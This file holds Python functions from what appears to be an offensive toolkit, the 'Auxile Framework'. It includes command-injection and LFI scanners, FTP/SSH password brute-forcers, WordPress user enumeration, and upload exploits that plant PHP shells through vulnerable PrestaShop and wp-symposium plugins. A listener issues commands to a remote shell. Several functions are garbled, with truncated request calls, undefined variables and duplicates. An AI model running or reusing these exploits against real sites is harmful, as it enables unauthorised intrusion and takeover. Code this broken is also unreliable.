def domage(t): r = requests.get('' + t) a = json.loads(r.text) try: printf('%s'%a['message']) except KeyError: printf('incorrect Input')
def rcevuln(web): if 'http' not in web: try: urllib.urlopen('http://' + web) url = 'http://' + web except: url = 'https://' + web else: url = web if '?' in url: printf("[+] Scanning for Remote Code/Command Execution ") payloads = [';${@print(md5(rce))}', ';${@print(md5("rce"))}'] payloads += [ '%253B%2524%257B%2540print%2528md5%2528%2522zigoo0%2522%2529%2529%257D%253B' ] payloads += [ ';uname;', '&&dir', '&&type C:\\boot.ini', ';phpinfo();', ';phpinfo' ] check = re.compile( "51107ed95250b4099a0f481221d56497|Linux|eval\(\)|SERVER_ADDR|Volume.+Serial|\[boot", re.I) main(url, payloads, check) else: printf('[!] no parameters found')
def tests_pyver(): if sys.version[:3] == "2.7" or "2" in sys.version[:3]: pass elif "3" in sys.version[:3]: printf("\r[i] Auxile has no support for Python 3.x") else: printf("\r[w] Your Python version is very old ..")
def help_menu(name): if name in webkit_dict or name in [ 'mxrecords', 'domain_age', 'whatcms', 'subdomain', 'geoip', 'honeypot' ]: hell(' -u <hostname>\t\thostname or domain name', name) elif name in encdec_array: hell(' -e, --enc\t\tencode string\n -d, --dec\t\tdecode string', name) elif name in ['adfin', 'upload', 'shell', 'dirscan', 'wpscan', 'user_pro']: hell(' -u <url>\t\twebsite target to scanning', name) elif name == 'nmap': hell(' -u\t\t\thostname or domain name\n -t\t\t\ttype to scanning', name) elif name in hash_array: hell(' -s <string>\t\tstring to hashing', name) elif name == 'dork': printf( 'Usage: %s [arguments]\n\npositional arguments:\n string\t\tdork, example: inurl:\'.php?id=\'\n\noptional arguments:\n -s\t\t\tscan sql error' % name) elif name == 'wp_user': hell( ' -u <url>\t\twebsite target to scanning\n -n <num>\t\tnumber of users', name) else: printf('%s: not found' % name, 2)
def cms(t): r = requests.get('' + t) a = json.loads(r.text) if a['result']['msg'] == 'Success': for i in a['result']: printf('%s: %s'%(str(i),str(a['result'][i]))) else: printf('%s'%str(a['result']['msg']))
def honey(ip): honey = "" + ip + "?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by" try: phoney = urlopen(honey).read().decode('utf-8') except URLError: phoney = None printf('No information available for that IP!') if phoney: print('Honeypot Probabilty: {probability}'.format(probability=float(phoney) * 10))
def lfiscan(web): url = parse(web) printf('[+] wait a minute, scanning (%s)' % url) lfis = open('core/wordlist/lfi.txt', 'r').readlines() for lfi in lfis: check = requests.get(url + lfi.strip()).text if re.findall("root:x", check): printf(' %s' % web + lfi.strip()) break
def start(web, path): for i in path: i = i.strip() r = requests.get(web + i) if r.status_code == 200: code = '\033[92m%s\033[0m' % r.status_code else: code = '\033[91m%s\033[0m' % r.status_code printf('%s [%s]' % (r.url, code))
def hash(name,msg): if name == 'rev': print('Reverse string: ' + msg[::-1]) elif name == 'rot13': print('Rot13: ' + msg[2:].encode('rot13')) elif name in ['md4','md5','sha1','sha224','sha256','sha384','sha512','ripemd160','whirlpool']: m = m.update(msg.encode('utf')) printf(name + ': ' + m.hexdigest())
def start(web, path): printf('[+] wait a minute, scanning (%s)' % web) for i in path: i = i.strip() r = requests.get(web + i) if r.status_code == 200: code = '\033[92m%s\033[0m' % r.status_code else: code = '\033[91m%s\033[0m' % r.status_code printf('%s [%s]' % (web + i, code))
def vtem_ex(web, file): files = {'userfile': (file, open(file, 'rb'), 'multipart/form-data')} url = parse(web) printf('[+] vtem slide show - file uploaded.') printf('[+] start uploading files (%s) to (%s)' % (file, url)) + "/modules/vtemslideshow/uploadimage.php", files=files) cek = requests.get(url + '/modules/vtemslideshow/slides/' + file) if cek.status_code == 200: printf('[+] Files successfully uploaded') printf(' => link: %s' % cek.url) else: printf('[!] Failed to upload files, maybe website is not vulnerable!')
def hpa_ex(web,file): url = parse(web) printf('[+] Home Page Advertise Exploit') printf('[+] start uploading files (%s)' % file) files = {'userfile':(file, open(file,'rb'),'multipart/form-data')} + "/modules/homepageadvertise/uploadimage.php",files=files) cek = requests.get(url + "/modules/homepageadvertise/slides/" + self.file) if cek.status_code == 200: printf('[+] Files successfully uploaded') printf(' => link: %s' % cek.url) else: printf('[!] Failed to upload files, maybe website is not vulnerable!')
def sss_ex(web,file): url = parse(web) printf('[+] Simple Slide Show exploit') printf('[+] start uploading files (%s)' % file) files={'userfile':(file, open(file,'rb'),'multipart/form-data')} + "/modules/simpleslideshow/uploadimage.php",files=files) cek = requests.get(url + '/modules/simpleslideshow/slides/' + file) if cek.status_code == 200: printf('[+] Files successfully uploaded') printf(' => link: %s' % cek.url) else: printf('[!] Failed to upload files, maybe website is not vulnerable')
def subdo(t): subdomains = [] req = requests.get("{d}&output=json".format(d=t)) if req.status_code == 200 and req.text != '': json_data = json.loads('[{}]'.format(req.text.replace('}{', '},{'))) for (key,value) in enumerate(json_data): subdomains.append(value['name_value']) sub = sorted(set(subdomains)) for subdomain in sub: printf('%s'%subdomain) else: printf("Information not available!")
def as_ex(web, file): url = parse(web) files = {'userfile': (file, open(file, 'rb'), 'multipart/form-data')} printf('[+] Addvanced slider - file uploaded.') printf('[+] start uploading files (%s) to (%s)' % (file, url)) + "/modules/advancedslider/file_upload.php", files=files) cek = requests.get(url + '/modules/advancedslider/slides/' + file) if cek.status_code == 200: printf('[+] Files successfully uploaded') printf(' => link: %s' % cek.url) else: printf('[!] Failed to upload files, maybe website is not vulnerable')
def email_to_domain(email): cek(email) url = ""+email+"&page=1§ion=admin" output = requests.get(url).content regex = re.compile('whoisology\.com\/(.*?)">') finded = regex.findall(output) if len(finded) > 0: for i in finded: if i.strip() != "": if '.' in i.strip(): printf('*? %s' % i.strip()) else: printf('[!] Empty domain result for email: %s' % email)
def user_scan(url, usern): results = [] if 'http' not in url: try: urllib2.urlopen('https://' + url) site = 'https://' + url except: site = 'http://' + url else: site = url printf('scanning (%s)' % site) for x in range(0, int(usern)): print('\rprogress %s' % (100 / int(usern) * x) + '%'), sys.stdout.flush() try: tmp = curllib(site, '', urllib.urlencode({"author": (x + 1)})) if tmp == False: continue tmp = find_user(tmp) except: pass if len(tmp['user']): results.append(tmp) max_login_len = len(tmp['user']) if max_login_len < len( tmp['user']) else max_login_len max_name_len = len(tmp['name']) if max_name_len < len( tmp['name']) else max_name_len if not results: printf('\nCould not find anything, maybe not vulnerable!') return results = sort_and_deduplicate(results) print("\nFound " + str(len(results)) + " users in " + site + "") login_space = (max_login_len - len("Login") + 1) * " " name_space = (max_name_len - len("Name") + 1) * " " login_bar = ((max_login_len - len("Login") + 1) + 6) * "-" name_bar = ((max_name_len - len("Name") + 1) + 5) * "-" header = "| Id | Login" + login_space + "| Name" + name_space + "|" print(" +----+" + login_bar + "+" + name_bar + "+") print(" " + header) print(" +----+" + login_bar + "+" + name_bar + "+") for x in range(0, len(results)): id_space = (3 - len(str(x + 1))) * " " login_space = (max_login_len - len(results[x]['user']) + 1) * " " name_space = (max_name_len - len(results[x]['name']) + 1) * " " print(" | " + str(x + 1) + id_space + "| " + results[x]['user'] + login_space + "| " + results[x]['name'] + name_space + "|") print(" +----+" + login_bar + "+" + name_bar + "+")
def ftp(hostname, username, wordlist): words = open(wordlist, 'r').readlines() printf('[+] Starting attack ! (%s)' % hostname) for i in words: try: ftp = FTP(hostname) login = ftp.login(username, i.strip()) if "230" in login: printf('[+] login success !!') printf('[+] username : %s' % username) printf('[+] password : %s' % i.strip()) except: pass printf('[w] Not found!')
def ssh(hostname, username, wordlist): words = open(wordlist, 'r').readlines() printf('[+] Starting attack ! (%s)' % hostname) for i in words: try: s = pxssh.pxssh() login = s.login(hostname, username, i.strip()) if login == True: printf('[+] login success !!') printf('[+] username : %s' % username) printf('[+] password : %s' % i.strip()) except: pass printf('[w] Not found!')
def dorking(string, sqlscan=None): debby = 0 urls = [] printf('[+] Searching..') for i in range(1, 10): payload = {'q': string, 'start': i} headers = {'User-agent': 'Mozilla/11.0'} req = requests.get('', payload, headers=headers) soup = BeautifulSoup(req.text, 'html.parser') h3tags = soup.find_all('h3', class_='r') for h3 in h3tags: try: urls.append('url\?q=(.+?)\&sa', h3.a['href']).group(1).replace('%3F', '?').replace( '%3D', '=')) except: continue payload = {'q': string, 'first': i} headers = {'User-agent': 'Mozilla/11.0'} req = requests.get('', payload, headers=headers) soup = BeautifulSoup(req.text, 'html.parser') h3tags = soup.find_all('li', class_='b_algo') for h3 in h3tags: try: urls.append( h3.find('a').attrs['href'].replace('%3F', '?').replace( '%3D', '=')) except: continue urls = sorted(set(urls)) if len(urls) == 0: printf('[!] no url found') elif sqlscan == None: for i in urls: printf(' %s' % i) else: for url in urls: source = requests.get(url + "'").text for type, eMSG in errors.items(): if, source): printf(' %s [\033[92m%s\033[0m]' % (url, type)) debby += 1 if debby == 0: printf('[!] no url found')
def listener_(host,port): printf('[+] Listening on port %s' % port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host,int(port))) s.listen(5) c,_ = s.accept() printf('[+] Session opened, ip: %s port %s' % (_[0],_[1])) while True: an = raw_input('Auxile (\033[93mmeterpreter\033[0m) _> ') cmd = an.replace(':','').split() if not cmd: pass else: c.send(cmd) c.recv(10000)
def help_menu(name): if name in webkit_dict or name in [ 'mxrecords', 'domain_age', 'whatcms', 'subdomain', 'geoip', 'honeypot' ]: hell(' -u HOSTNAME\thostname or domain name\n', name, '-u HOSTNAME') elif name in encdec_array: hell(' -e, --enc\tencode strings\n -d, --dec\tdecode strings\n', name, '( --enc | --dec )') elif name in finder_array: hell(' -u URL\ttarget website\n', name, '-u URL') elif name == 'nmap': hell( ' -u HOSTNAME\thostname or domain name\n -t TYPE\ttype to be scanned\n', name, '-t ( all-cve | sqli-scan | wordpress | heartbleed | ssh-brute | csrf | webdav-scan | smtp-brute ) -u <target>' ) elif name in hash_array: hell(' -s STRING\tthe word will be changed to hash\n', name, '-s STRING') elif name == 'dork': printf( '\n[u] %s [-s] STRING\n\npositional arguments:\n string\tdork, example: inurl:\'.php?id=\'\n\noptional arguments:\n -s, --scan\tscan sqli vulnerability\n' % name) elif name == 'wp_user': hell(' -u URL\ttarget website\n -n NUM\tnumber of users\n', name, '-u URL') elif name in exp: hell( ' -u URL\ttarget website\n -f FILE\tfile that will be uploaded\n', name, '-u URL -f FILE') elif name == 'default_pass': hell(' -m MANUFACTOR\tPassword string\n', name, '-m MANUFACTOR') elif name == 'hackedmail_check': hell(' -e EMAIL\tYour email will be checked\n', name, '-e EMAIL') elif name == 'wordpress_brute': hell( ' -s URL\ttarget website\n -u USERNAME\tusername of Wordpress\n -w WORDLIST\twordlist for attack target\n', name, '-s URL -u USERNAME -w WORDLIST') elif name in ['ssh_brute', 'ftp_brute']: xs = name.split('_')[0] hell( ' -i HOSTNAME\tip address of {xs} server\n -u USERNAME\tusername of {xs} server\n -w WORDLIST\twordlist path\n' .format(xs=xs), name, '-i HOSTNAME -u USERNAME -w WORDLIST') else: printf('%s: not found' % name, 2)
def help_menu(name): if name in webkit_dict or name in ['mxrecords','domain_age','whatcms','subdomain','geoip','honeypot']: hell(' -u <hostname>\thostname or domain name\n',name) elif name in encdec_array: hell(' -e, --enc\tencode strings\n -d, --dec\tdecode strings\n',name) elif name in finder_array: hell(' -u <url>\ttarget website\n',name) elif name == 'nmap': hell(' -u\t\thostname or domain name\n -t\t\ttype to be scanned\n',name) elif name in hash_array: hell(' -s <string>\tthe word will be changed to hash\n',name) elif name == 'dork': printf('\nUsage: %s [arguments]\n\npositional arguments:\n string\tdork, example: inurl:\'.php?id=\'\n\noptional arguments:\n -s\t\tscan sqli vulnerability\n' % name) elif name == 'wp_user': hell(' -u <url>\ttarget website\n -n <num>\tnumber of users\n',name) elif name in exp: hell(' -u <url>\ttarget website\n -f <file>\tfile that will be uploaded\n',name) else: printf('%s: not found' % name,2)
def check_vuln(url): plug = "/wp-content/plugins/userpro/css/userpro.min.css" vuln = "/?up_auto_log=true" if 'http' not in url: try: urlopen('https://' + url) url = 'https://' + url except: url = 'http://' + url printf('[+] check plugins (%s)' % url) pURL = urlopen(url + plug).read() if pURL.find(".userpro") > -1: printf('[+] Plugin is installed. checking vulnerable..') pURL = urlopen(url + vuln).read() if pURL.find("admin-bar-css") > -1 or urlopen( url + 'wp-admin').read().find('admin-bar-css') > -1: printf('[+] this website is vulnerable..') else: printf('[!] this website isn\'t vulnerable..') else: printf('[!] Plugin isn\'t installed')
def banner(): try: sys.stdout.write("\x1b]2;Auxile Framework - @CiKu370\x07") for i in range(random.randrange(1,2)):loading("Loading the fingerprinting framework..") tests_pyver() tests_platform() printf('''\r[w] If you don't know how run it use help !\033[92m ▄████████ ███ █▄ ▀████ ▐████▀ ▄█ ▄█ ▄████████ ███ ███ ███ ███ ███▌ ████▀ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▐███ ███▌ ███ ███ █▀ ███ ███ ███ ███ ▀███▄███▀ ███▌ ███ ▄███▄▄▄ ▀███████████ ███ ███ ████▀██▄ ███▌ ███ ▀▀███▀▀▀ ███ ███ ███ ███ ▐███ ▀███ ███ ███ ███ █▄ ███ ███ ███ ███ ▄███ ███▄ ███ ███▌ ▄ ███ ███ ███ █▀ ████████▀ ████ ███▄ █▀ █████▄▄██ ██████████\033[0m Coded by @CiKu370 ''') except KeyboardInterrupt: print('\n\033[91mERROR\033[0m: Interrupt..') exit()
def user_scan(url, usern): results = [] if 'http' not in url: try: urllib2.urlopen('https://' + url) site = 'https://' + url except: site = 'http://' + url else: site = url printf('[+] wait a minute, scanning (%s)' % site) for x in range(0, int(usern)): try: tmp = curllib(site, '', urllib.urlencode({"author": (x + 1)})) if tmp == False: continue tmp = find_user(tmp) except: pass if len(tmp['user']): results.append(tmp) if not results: printf('[!] Could not find anything, maybe not vulnerable!') return results = sort_and_deduplicate(results) print("[+] Found " + str(len(results)) + " users in " + site + "") for i in range(0, len(results)): printf(' user: %s\n name: %s' % (results[i]['user'], results[i]['name']))
def default_pass(manufactor): x = {} search_link = "" + manufactor printf('[+] Searching for passwords.') req = requests.get(search_link) html = req.content result = html.split('<TR VALIGN="top">') try: result.pop(0) result.pop(0) for line in result: spliting = line.split('<TD NOWRAP>') string = '' for element in spliting: if "</TD>" in element and element.strip() != '': manufactor = spliting[1].split('</TD>')[0] product = spliting[2].split('</TD>')[0] protocol = spliting[4].split('</TD>')[0] user = spliting[5].split('</TD>')[0] password = spliting[6].split('</TD>')[0] printf( '[+] Manufactor: %s\n[+] Product: %s\n[+] Protocol: %s\n[+] User: %s\n[+] Password: %s' % (manufactor, product, protocol, user, password)) except IndexError: printf('[w] No results were found for this manufacturer.')
def xss(web): vuln = 0 payloads = open('core/wordlist/xss.txt') if 'http' not in web: try: requests.get('http://' + web) url = 'http://' + web except: url = 'https://' + web else: url = web if '=' in url: printtf('[+] Scanning (%s)' % url) r = requests.get(url) content = r.text for payload in payloads: if payload.strip().lower() in content.lower(): print(" XSS Vulnerable: " + url + payload) vuln += 1 if len(vuln) == 0: print "[!] Not vulnerable!" else: printf('[!] No parameter found!')
def upload(web): payloads = {} path = open('core/wordlist/upload.txt', 'r').readlines() url = parse(web) printf('[+] scanning (%s)' % url) for i in path: x = i.strip().split(':') try: payloads.update({x[0]: x[1]}) except IndexError: pass for i in payloads: r = requests.get(url + '/' + payloads[i]) if r.status_code == 200: printf(' %s [\033[92mVuln\033[0m]' % i) printf(' => link: %s' % r.url) else: printf(' %s [\033[91mNot Vuln\033[0m]' % i)
def exploit_wp(url, file): if 'http' not in url: try: urllib2.urlopen('http://' + url) site = 'http://' + url except: site = 'https://' + url else: site = url printf('[+] create random directory and shell..') if not os.path.isfile(file) and not os.access(file, os.R_OK): printf('[!] file is missing or not readable', 2) return socket.setdefaulttimeout(10) url_upload = site + '/wp-content/plugins/wp-symposium/server/php/' content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$' rand_dirname = id_gen() rand_shellname = id_gen() body = create(file, rand_dirname, rand_shellname, url_upload) headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/36.0.1985.125 Safari/537.36', 'content-type': content_type, 'content-length': str(len(body)) } printf('[+] start upload %s to %s' % (file, site)) req = urllib2.Request(url_upload + 'index.php', body, headers) response = urllib2.urlopen(req) read = if "error" in read or read == "0" or read == "": printf('[!] upload failed, maybe site isn\'t vulnerable!') else: printf('[+] success uploaded') printf('[+] location %s' % url_upload + rand_dirname + rand_shellname + '.php')